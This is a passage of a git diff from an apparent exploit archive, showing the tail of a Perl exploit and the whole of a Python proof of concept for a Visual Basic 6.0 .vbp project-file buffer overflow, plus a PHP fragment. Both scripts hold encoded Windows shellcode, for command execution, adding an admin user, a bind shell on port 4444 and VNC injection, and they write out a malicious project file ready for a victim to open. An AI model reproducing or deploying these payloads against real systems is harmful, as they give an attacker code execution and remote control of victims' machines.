+ "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". + "\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x44\x4e\x53\x4b\x38\x4e\x37". + "\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x38\x4f\x54\x4a\x51\x4b\x58". + "\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x48". + "\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c". + "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". + "\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x47\x45\x4e\x4b\x48". + "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x50\x4b\x54". + "\x4b\x48\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x58". + "\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". + "\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x53\x45\x48\x42\x4c\x4a\x37". + "\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a". + "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b". + "\x42\x30\x42\x30\x42\x50\x4b\x58\x4a\x36\x4e\x53\x4f\x45\x41\x53". + "\x48\x4f\x42\x36\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57". + "\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x46\x4a\x59". + "\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x46". + "\x46\x56\x50\x42\x45\x36\x4a\x37\x45\x56\x42\x32\x4f\x52\x43\x46". + "\x42\x42\x50\x56\x45\x46\x46\x47\x42\x52\x45\x47\x43\x37\x45\x36". + "\x44\x57\x42\x42\x46\x53\x46\x36\x4d\x56\x49\x46\x50\x56\x42\x32". + "\x4b\x36\x4f\x36\x43\x37\x4a\x46\x49\x36\x42\x32\x4f\x42\x41\x34". + "\x46\x54\x46\x34\x42\x32\x48\x52\x48\x52\x42\x52\x50\x36\x45\x46". + "\x46\x57\x42\x42\x4e\x56\x4f\x36\x43\x36\x41\x36\x4e\x46\x47\x56". + "\x44\x37\x4f\x36\x45\x57\x42\x57\x42\x52\x41\x44\x46\x56\x4d\x56". + "\x49\x46\x50\x56\x49\x46\x43\x47\x46\x57\x44\x37\x41\x36\x46\x57". + "\x4f\x46\x44\x37\x43\x37\x42\x32\x46\x43\x46\x36\x4d\x56\x49\x36". 
+ "\x50\x56\x42\x42\x4f\x32\x41\x44\x46\x54\x46\x54\x42\x50\x5a"; + +# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com +$shellc3 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e". + "\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38". + "\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x48\x4e\x37". + "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x58". + "\x4f\x45\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x48". + "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c". + "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e". + "\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x32\x45\x57\x45\x4e\x4b\x48". + "\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54". + "\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x58". + "\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x33\x4b\x4d". + "\x46\x46\x4b\x48\x43\x34\x42\x53\x4b\x58\x42\x54\x4e\x30\x4b\x48". + "\x42\x57\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x50\x50\x45\x4a\x46". + "\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x46". + "\x43\x45\x48\x56\x4a\x36\x43\x53\x44\x33\x4a\x46\x47\x57\x43\x37". + "\x44\x53\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e". + "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e". + "\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x36\x44\x50". + "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45". + "\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x55\x43\x54". + "\x43\x45\x43\x54\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x31". + "\x4e\x35\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x46\x46\x4a". 
+ "\x4c\x41\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x46\x42\x31". + "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32". + "\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d". + "\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d". + "\x42\x45\x46\x45\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x36". + "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x45". + "\x4f\x4f\x42\x4d\x48\x56\x4c\x36\x46\x56\x48\x46\x4a\x36\x43\x46". + "\x4d\x36\x49\x38\x45\x4e\x4c\x46\x42\x35\x49\x45\x49\x32\x4e\x4c". + "\x49\x48\x47\x4e\x4c\x56\x46\x54\x49\x48\x44\x4e\x41\x43\x42\x4c". + "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42". + "\x43\x59\x4d\x38\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36". + "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x54\x4f\x4f". + "\x48\x4d\x4b\x45\x47\x45\x44\x35\x41\x35\x41\x45\x41\x55\x4c\x46". + "\x41\x30\x41\x45\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x36". + "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x56". + "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x48\x47\x35\x4e\x4f". + "\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d". + "\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x55\x43\x45\x4f\x4f\x48\x4d". + "\x4f\x4f\x42\x4d\x5a"; + +# win32_bind_vncinject - VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com +$shellc4 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4a\x4e\x48\x55\x42\x50". + "\x42\x30\x42\x30\x43\x55\x45\x35\x48\x45\x47\x45\x4b\x38\x4e\x36". + "\x46\x42\x4a\x31\x4b\x38\x45\x54\x4e\x33\x4b\x48\x46\x55\x45\x30". 
+ "\x4a\x47\x41\x50\x4c\x4e\x4b\x58\x4c\x54\x4a\x31\x4b\x48\x4c\x55". + "\x42\x42\x41\x50\x4b\x4e\x43\x4e\x44\x43\x49\x54\x4b\x58\x46\x33". + "\x4b\x48\x41\x30\x50\x4e\x41\x33\x4f\x4f\x4e\x4f\x41\x43\x42\x4c". + "\x4e\x4a\x4a\x53\x42\x4e\x46\x57\x47\x30\x41\x4c\x4f\x4c\x4d\x30". + "\x41\x30\x47\x4c\x4b\x4e\x44\x4f\x4b\x33\x4e\x47\x46\x42\x46\x51". + "\x45\x37\x41\x4e\x4b\x38\x4c\x35\x46\x52\x41\x30\x4b\x4e\x48\x56". + "\x4b\x58\x4e\x50\x4b\x54\x4b\x48\x4c\x55\x4e\x51\x41\x30\x4b\x4e". + "\x4b\x58\x46\x30\x4b\x58\x41\x50\x4a\x4e\x4b\x4e\x44\x50\x41\x43". + "\x42\x4c\x4f\x35\x50\x35\x4d\x35\x4b\x45\x44\x4c\x4a\x50\x42\x50". + "\x50\x55\x4c\x36\x42\x33\x49\x55\x46\x46\x4b\x58\x49\x31\x4b\x38". + "\x4b\x45\x4e\x50\x4b\x38\x4b\x35\x4e\x31\x4b\x48\x4b\x51\x4b\x58". + "\x4b\x45\x4a\x30\x43\x55\x4a\x56\x50\x38\x50\x34\x50\x50\x4e\x4e". + "\x4f\x4f\x48\x4d\x49\x48\x47\x4c\x41\x58\x4e\x4e\x42\x50\x41\x50". + "\x42\x50\x42\x30\x47\x45\x48\x55\x43\x45\x49\x38\x45\x4e\x4a\x4e". + "\x47\x52\x42\x30\x42\x30\x42\x30\x42\x59\x41\x50\x42\x30\x42\x50". + "\x48\x4b\x49\x51\x4a\x51\x47\x4e\x46\x4a\x49\x31\x42\x47\x49\x4e". + "\x45\x4e\x49\x54\x48\x58\x49\x54\x46\x4a\x4c\x51\x42\x37\x47\x4c". + "\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x49\x4d\x49\x50\x45\x4f\x4d\x4a". + "\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x43\x47\x45\x43\x35\x44\x33\x4f\x45". + "\x43\x33\x44\x43\x42\x30\x4b\x45\x4d\x38\x4b\x34\x42\x42\x41\x55". + "\x4f\x4f\x47\x4d\x49\x58\x4f\x4d\x49\x38\x43\x4c\x4d\x58\x45\x47". + "\x46\x41\x4c\x36\x47\x30\x49\x45\x41\x35\x43\x45\x4f\x4f\x46\x43". + "\x4f\x38\x4f\x4f\x45\x35\x46\x50\x49\x35\x49\x58\x46\x50\x50\x48". + "\x44\x4e\x44\x4f\x4b\x32\x47\x52\x46\x35\x4f\x4f\x47\x43\x4f\x4f". + "\x45\x35\x42\x43\x41\x53\x42\x4c\x42\x45\x42\x35\x42\x35\x42\x55". + "\x42\x54\x42\x55\x42\x44\x42\x35\x4f\x4f\x45\x45\x4e\x32\x49\x48". + "\x47\x4c\x41\x53\x4b\x4d\x43\x45\x43\x45\x4a\x46\x44\x30\x42\x50". + "\x41\x31\x4e\x55\x49\x48\x42\x4e\x4c\x36\x42\x31\x42\x35\x47\x55". 
+ "\x4f\x4f\x45\x35\x46\x32\x43\x55\x47\x45\x4f\x4f\x45\x45\x4a\x32". + "\x43\x55\x46\x35\x47\x45\x4f\x4f\x45\x55\x42\x32\x49\x48\x47\x4c". + "\x41\x58\x4e\x4e\x42\x50\x42\x31\x42\x50\x42\x50\x49\x58\x43\x4e". + "\x4c\x46\x42\x50\x4a\x46\x42\x30\x42\x51\x42\x30\x42\x30\x43\x35". + "\x47\x45\x4f\x4f\x45\x35\x4a\x31\x41\x58\x4e\x4e\x42\x30\x46\x30". + "\x42\x30\x42\x30\x4f\x4f\x43\x4d\x5a"; + +# win32_exec - EXITFUNC=seh CMD=shutdown -c "HAI VEn0m pwn3d j00r b0x0r wif k0sh1 u b1tch" Size=451 Encoder=PexAlphaNum http://metasploit.com +$shellc5 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". + "\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x43\x4b\x38\x4e\x47". + "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x51\x4b\x48". + "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x48". + "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c". + "\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e". + "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x38". + "\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34". + "\x4b\x38\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x48". + "\x41\x50\x4b\x4e\x49\x48\x4e\x35\x46\x32\x46\x50\x43\x4c\x41\x43". + "\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x43\x45\x58\x42\x4c\x4a\x37". + "\x4e\x50\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x57\x4e\x51\x4d\x4a". + "\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b". + "\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x45\x41\x53". + "\x48\x4f\x42\x36\x48\x35\x49\x48\x4a\x4f\x43\x58\x42\x4c\x4b\x37". + "\x42\x45\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x56\x4a\x39". 
+ "\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x37\x4a\x56".
+ "\x45\x47\x46\x37\x46\x46\x4f\x36\x47\x37\x50\x46\x42\x42\x4d\x42".
+ "\x43\x36\x42\x42\x44\x42\x4a\x34\x41\x54\x49\x34\x42\x42\x48\x35".
+ "\x45\x34\x50\x56\x42\x33\x4d\x56\x42\x52\x42\x57\x47\x57\x50\x56".
+ "\x43\x33\x46\x36\x42\x32\x4c\x46\x42\x33\x42\x33\x44\x37\x42\x32".
+ "\x44\x46\x42\x53\x4a\x57\x42\x33\x44\x47\x42\x52\x47\x47\x49\x56".
+ "\x48\x46\x42\x52\x4b\x56\x42\x33\x43\x57\x4a\x56\x41\x53\x42\x32".
+ "\x45\x37\x42\x32\x44\x56\x41\x43\x46\x37\x43\x46\x4a\x56\x44\x32".
+ "\x42\x30\x5a";
+
+$endQuote = "\x22";
+
+$i = $ARGV[0];
+
+
+if ($i==1){
+print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc1$endQuote$koshi";
+exit;
+}
+
+
+if ($i==2){
+print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc2$endQuote$koshi";
+exit;
+}
+
+
+if ($i==3){
+print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc3$endQuote$koshi";
+exit;
+}
+
+
+if ($i==4){
+print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc4$endQuote$koshi";
+exit;
+}
+
+
+if ($i==5){
+print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc5$endQuote$koshi";
+exit;
+}
+
+
+print "\n";
+print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
+print " +++ +++\n";
+print " +++ +++\n";
+print " +++ Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec +++\n";
+print " +++ Written By Koshi +++\n";
+print " +++ Greets: Rima my baby! Draven, thanks for helping. +++\n";
+print " +++ +++\n";
+print " +++ Usage Ex.: ./vb6.pl 1 >>Project1.vbp +++\n";
+print " +++ +++\n";
+print " +++ Options: +++\n";
+print " +++ 1 - win32_exec CALC.EXE +++\n";
+print " +++ 2 - win32_adduser Pass=4dmin User=koshi +++\n";
+print " +++ 3 - win32_bind Port 4444 +++\n";
+print " +++ 4 - win32_bind_vncinject Port 5900 +++\n";
+print " +++ 5 - win32_exec shutdown -c \x22HAI VEn0m pw..
+++\n";
+print " +++ +++\n";
+print " +++ +++\n";
+print " +++ Notes: Ship final .VBP file with a .FRM file to avoid +++\n";
+print " +++ warnings in Visual Basic 6.0 +++\n";
+print " +++ +++\n";
+print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
+
+
+
+
+
+
+exit;
+
+
+#EOF
+
+# milw0rm.com [2007-09-04]
diff --git a/platforms/windows/local/4431.py b/platforms/windows/local/4431.py
index 358dd48c8..275ce50e3 100755
--- a/platforms/windows/local/4431.py
+++ b/platforms/windows/local/4431.py
@@ -1,102 +1,102 @@ -#usage: vbexploit.py FileName.vbp - -import sys - -print "--------------------------------------------------------------------------" -print " [PoC_2] Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution " -print " author: shinnai" -print " mail: shinnai[at]autistici[dot]org" -print " site: http://shinnai.altervista.org\n" -print " based on Koshi exploit" -print " http://www.milw0rm.com/exploits/4361\n" -print " I try his exploit on Windows XP Pro SP2 Ita, full patched and it doesn't" -print " work, but he said:\n" -print ' "# ...backwards..if you don' + "'t" + ' know why, then gtfo."\n' -print " ok, now I know why brotha, I got this exception:\n" -print ' "Access violation when writing to [63636363]"\n' -print " so I search another way to get exploit working but I need to do some" -print ' changes to memory address ("00" became "20") and nop ("90" became "3F").' -print " Well, here it is a PoC_2 and if it doesn't work and" + ' "you don' + "'t know why," -print ' then"' + "... feel free to ask ;)\n" -print " dedicated to all Italian vb6 programmers... 
be safe bros" -print "--------------------------------------------------------------------------" - -buff = "A" * 494 - -EIP = "\x37\x17\x8B\x60"; #call ESP from VBSCC.DLL esp, you can (or must) change as you like - -buff2 = "A" * 12 - -RW_Memory = "\x20\x20\x01\x20" #patched writeable memory address "\x00\x00\x01\x00" - -nop = "\x3F\x3F\x3F\x3F" #patched nop "\x90" - -shellcode = \ -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+\ -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+\ -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+\ -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+\ -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"+\ -"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"+\ -"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"+\ -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"+\ -"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"+\ -"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+\ -"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"+\ -"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"+\ -"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"+\ -"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+\ -"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"+\ -"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"+\ -"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"+\ -"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"+\ -"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"+\ -"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"+\ -"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"+\ -"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a" - -try: - vb_proj = \ - 'Type=Exe\n'+\ - 
'Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\WINDOWS'+\ - '\system32\stdole2.tlb#OLE Automation' + buff + EIP + buff2 + RW_Memory + nop + shellcode + nop +\ - '\nStartup="Sub Main"\n'+\ - 'Command32=""\n'+\ - 'Name=' + sys.argv[1]+\ - '\nHelpContextID="0"\n'+\ - 'CompatibleMode="0"\n'+\ - 'MajorVer=1\n'+\ - 'MinorVer=0\n'+\ - 'RevisionVer=0\n'+\ - 'AutoIncrementVer=0\n'+\ - 'ServerSupportFiles=0\n'+\ - 'VersionCompanyName="xxx"\n'+\ - 'CompilationType=0\n'+\ - 'OptimizationType=0\n'+\ - 'FavorPentiumPro(tm)=0\n'+\ - 'CodeViewDebugInfo=0\n'+\ - 'NoAliasing=0\n'+\ - 'BoundsCheck=0\n'+\ - 'OverflowCheck=0\n'+\ - 'FlPointCheck=0\n'+\ - 'FDIVCheck=0\n'+\ - 'UnroundedFP=0\n'+\ - 'StartMode=0\n'+\ - 'Unattended=0\n'+\ - 'Retained=0\n'+\ - 'ThreadPerObject=0\n'+\ - 'MaxNumberOfThreads=1\n\n'+\ - '[MS Transaction Server]\n'+\ - 'AutoRefresh=1' - - out_file = open(sys.argv[1],'w') - out_file.write(vb_proj) - out_file.close() - print "\nFILE CREATION COMPLETED!\n" -except: - print " \n -------------------------------------" - print " Usage: exploit.py FileName.vbp" - print " -------------------------------------" - print "\nAN ERROR OCCURS DURING FILE CREATION!" 
- -# milw0rm.com [2007-09-19] +#usage: vbexploit.py FileName.vbp + +import sys + +print "--------------------------------------------------------------------------" +print " [PoC_2] Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution " +print " author: shinnai" +print " mail: shinnai[at]autistici[dot]org" +print " site: http://shinnai.altervista.org\n" +print " based on Koshi exploit" +print " http://www.milw0rm.com/exploits/4361\n" +print " I try his exploit on Windows XP Pro SP2 Ita, full patched and it doesn't" +print " work, but he said:\n" +print ' "# ...backwards..if you don' + "'t" + ' know why, then gtfo."\n' +print " ok, now I know why brotha, I got this exception:\n" +print ' "Access violation when writing to [63636363]"\n' +print " so I search another way to get exploit working but I need to do some" +print ' changes to memory address ("00" became "20") and nop ("90" became "3F").' +print " Well, here it is a PoC_2 and if it doesn't work and" + ' "you don' + "'t know why," +print ' then"' + "... feel free to ask ;)\n" +print " dedicated to all Italian vb6 programmers... 
be safe bros" +print "--------------------------------------------------------------------------" + +buff = "A" * 494 + +EIP = "\x37\x17\x8B\x60"; #call ESP from VBSCC.DLL esp, you can (or must) change as you like + +buff2 = "A" * 12 + +RW_Memory = "\x20\x20\x01\x20" #patched writeable memory address "\x00\x00\x01\x00" + +nop = "\x3F\x3F\x3F\x3F" #patched nop "\x90" + +shellcode = \ +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+\ +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+\ +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+\ +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+\ +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"+\ +"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"+\ +"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"+\ +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"+\ +"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"+\ +"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+\ +"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"+\ +"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"+\ +"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"+\ +"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+\ +"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"+\ +"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"+\ +"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"+\ +"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"+\ +"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"+\ +"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"+\ +"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"+\ +"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a" + +try: + vb_proj = \ + 'Type=Exe\n'+\ + 
'Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\WINDOWS'+\ + '\system32\stdole2.tlb#OLE Automation' + buff + EIP + buff2 + RW_Memory + nop + shellcode + nop +\ + '\nStartup="Sub Main"\n'+\ + 'Command32=""\n'+\ + 'Name=' + sys.argv[1]+\ + '\nHelpContextID="0"\n'+\ + 'CompatibleMode="0"\n'+\ + 'MajorVer=1\n'+\ + 'MinorVer=0\n'+\ + 'RevisionVer=0\n'+\ + 'AutoIncrementVer=0\n'+\ + 'ServerSupportFiles=0\n'+\ + 'VersionCompanyName="xxx"\n'+\ + 'CompilationType=0\n'+\ + 'OptimizationType=0\n'+\ + 'FavorPentiumPro(tm)=0\n'+\ + 'CodeViewDebugInfo=0\n'+\ + 'NoAliasing=0\n'+\ + 'BoundsCheck=0\n'+\ + 'OverflowCheck=0\n'+\ + 'FlPointCheck=0\n'+\ + 'FDIVCheck=0\n'+\ + 'UnroundedFP=0\n'+\ + 'StartMode=0\n'+\ + 'Unattended=0\n'+\ + 'Retained=0\n'+\ + 'ThreadPerObject=0\n'+\ + 'MaxNumberOfThreads=1\n\n'+\ + '[MS Transaction Server]\n'+\ + 'AutoRefresh=1' + + out_file = open(sys.argv[1],'w') + out_file.write(vb_proj) + out_file.close() + print "\nFILE CREATION COMPLETED!\n" +except: + print " \n -------------------------------------" + print " Usage: exploit.py FileName.vbp" + print " -------------------------------------" + print "\nAN ERROR OCCURS DURING FILE CREATION!" + +# milw0rm.com [2007-09-19] diff --git a/platforms/windows/local/4517.php b/platforms/windows/local/4517.php index a31db094f..33985c9ea 100755 --- a/platforms/windows/local/4517.php +++ b/platforms/windows/local/4517.php @@ -1,44 +1,44 @@ -
    ionCube output:

    "; - -echo $MyBoot_ioncube; -?> - -# milw0rm.com [2007-10-11] +
    ionCube output:

